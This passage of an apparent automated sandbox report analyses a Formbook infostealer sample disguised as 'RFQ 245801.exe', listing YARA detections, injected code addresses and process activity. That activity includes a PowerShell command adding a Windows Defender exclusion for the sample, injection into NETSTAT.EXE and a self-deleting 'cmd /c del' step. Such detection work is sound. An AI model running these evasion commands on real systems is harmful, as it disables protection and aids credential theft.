          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA7036
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_00642167
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_00641715
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319A352
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031A03E6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030EE3F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03180274
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031602C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030D0100
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0317A118
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03168158
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031A01AA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031941A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031981CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03172000
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03104750
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E0770
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030DC7C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FC6E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E0535
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031A0591
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03184420
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03192446
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0318E4F6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03196BD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030DEA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030F6962
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E29A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031AA9A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E2840
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030EA840
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030C68B8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0310E8F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03100F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03182F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03122F28
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03154F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0315EFA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030D2FC8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319EE26
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E0E59
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319CE93
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030F2E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319EEDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0317CD1F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030EAD00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030F8DBF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030DADE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E0C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03180CB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030D0CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319132D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030CD34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0312739A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E52A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FB2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031812ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FD2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031AB16B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0311516C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030CF172
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030EB1B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E70C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0318F0CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031970E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319F0E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319F7B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03125630
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_031916CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03197571
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0317D5B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319F43F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030D1460
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319FB76
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FFB80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03155BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0311DBF9
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319FA49
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03197A46
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03153A6C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03125AA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0317DAAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03181AA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0318DAC6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03175910
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FB950
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0314D800
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E38E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319FF09
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E1F92
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319FFB1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E9EB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03191D5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030E3D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03197D73
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_030FFDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_03159C32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_0319FCF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026BE792
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026A9E60
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026A9E5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026A2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026A2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_026A2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EEA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EEB232
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EE5B32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EE5B30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EE1082
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EE8912
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EEE5CD
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_02EE2D02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0315F290 appears 103 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 030CB970 appears 262 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0314EA12 appears 86 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03115130 appears 58 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03127E54 appears 102 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 017AF290 appears 103 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 01777E54 appears 107 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 0179EA12 appears 86 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 0171B970 appears 262 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 01765130 appears 58 times
Source: RFQ 245801.exe Static PE information: invalid certificate
Source: RFQ 245801.exe, 00000000.00000002.1744400565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000000.1688427062.00000000006CC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1753756214.00000000072B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799833129.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ 245801.exe
Source: RFQ 245801.exe Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Source: RFQ 245801.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: RFQ 245801.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@13/6@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\RFQ 245801.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 245801.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Users\user\Desktop\RFQ 245801.exe Mutant created: \Sessions\1\BaseNamedObjects\WIAEYG
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpfsdf0.kdq.ps1
Source: RFQ 245801.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ 245801.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\RFQ 245801.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ 245801.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ 245801.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: amsi.dll
